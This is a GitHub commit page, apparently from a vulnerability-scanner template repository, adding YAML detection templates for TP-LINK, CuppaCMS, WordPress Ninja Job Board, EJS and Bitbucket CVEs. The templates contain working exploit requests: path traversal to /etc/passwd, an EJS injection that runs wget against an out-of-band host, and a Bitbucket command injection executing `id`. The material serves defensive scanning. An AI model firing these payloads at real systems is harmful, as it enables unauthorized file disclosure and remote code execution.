-
Notifications
You must be signed in to change notification settings - Fork 670
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
45 changed files
with
2,550 additions
and
1,966 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,12 +1,12 @@ | ||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | ||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| | ||
| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 | | ||
| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 | | ||
| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 | | ||
| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 | | ||
| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | | | ||
| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | | | ||
| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | | | ||
| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | | | ||
| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | | | ||
| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | | | ||
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 | | ||
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 | | ||
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 | | ||
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 | | ||
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | | | ||
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | | | ||
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | | | ||
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | | | ||
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | | | ||
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
id: CVE-2015-3035 | ||
|
||
info: | ||
name: Multiple TP-LINK Products Vulnerable - Local File Inclusion | ||
author: 0x_Akoko | ||
severity: high | ||
description: | | ||
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. | ||
reference: | ||
- https://seclists.org/fulldisclosure/2015/Apr/26 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035 | ||
- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt | ||
- http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware | ||
classification: | ||
cve-id: CVE-2015-3035 | ||
metadata: | ||
shodan-query: http.title:"TP-LINK" | ||
verified: "true" | ||
tags: router,lfi,seclists,cve,cve2015,tplink,kev | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/login/../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2022-2544 | ||
info: | ||
name: Ninja Job Board < 1.3.3 - Resume Disclosure via Directory Listing | ||
author: tess | ||
severity: high | ||
description: The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated Directory Listing which allows the download of uploaded resumes. | ||
reference: | ||
- https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php | ||
- https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2544 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2022-2544 | ||
cwe-id: CWE-425 | ||
metadata: | ||
verified: true | ||
tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/" | ||
- "{{BaseURL}}/wp-content/uploads/wpjobboard/" | ||
|
||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "Index of /wp/wp-content/uploads/wpjobboard" | ||
- "Index of /wp-content/uploads/wpjobboard" | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2022-29078 | ||
|
||
info: | ||
name: Ejs - RCE | ||
author: For3stCo1d | ||
severity: critical | ||
description: | | ||
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation). | ||
reference: | ||
- https://eslam.io/posts/ejs-server-side-template-injection-rce/ | ||
- /~https://github.com/miko550/CVE-2022-29078 | ||
- /~https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-29078 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2022-29078 | ||
cwe-id: CWE-74 | ||
tags: cve,cve2022,rce,ejs,nodejs,oast | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol # Confirms the HTTP Interaction | ||
words: | ||
- "http" | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "You are viewing page number" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2022-34121 | ||
|
||
info: | ||
name: CuppaCMS v1.0 - Local File Inclusion | ||
author: edoardottt | ||
severity: high | ||
description: | | ||
Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php. | ||
reference: | ||
- /~https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121 | ||
- /~https://github.com/CuppaCMS/CuppaCMS/issues/18 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2022-34121 | ||
cwe-id: CWE-829 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2022,lfi,cuppa,cms | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /templates/default/html/windows/right.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
url=../../../../../../../../../../../../etc/passwd | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,66 @@ | ||
id: CVE-2022-36804 | ||
|
||
info: | ||
name: Atlassian Bitbucket Command Injection Vulnerability | ||
author: DhiyaneshDk,tess,sullo | ||
severity: high | ||
description: | | ||
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. | ||
reference: | ||
- /~https://github.com/notdls/CVE-2022-36804 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36804 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804 | ||
- https://jira.atlassian.com/browse/BSERV-13438 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 8.8 | ||
cve-id: CVE-2022-36804 | ||
cwe-id: CWE-77 | ||
metadata: | ||
shodan-query: http.component:"BitBucket" | ||
tags: cve,cve2022,bitbucket,atlassian | ||
|
||
variables: | ||
data: '{{rand_base(5)}}' | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /rest/api/latest/repos HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1 | ||
Host: {{Hostname}} | ||
iterate-all: true | ||
extractors: | ||
- type: json # type of the extractor | ||
part: body | ||
name: key | ||
json: | ||
- '.["values"] | .[] | .["project"] | .key' | ||
internal: true | ||
|
||
- type: json # type of the extractor | ||
part: body | ||
name: slug | ||
json: | ||
- '.["values"] | .[] | .slug' | ||
internal: true | ||
|
||
- type: regex | ||
group: 1 | ||
regex: | ||
- 'uid=.*\(([a-z]+)\):' | ||
|
||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "com.atlassian.bitbucket.scm.CommandFailedException" | ||
|
||
- type: status | ||
status: | ||
- 500 |
Oops, something went wrong.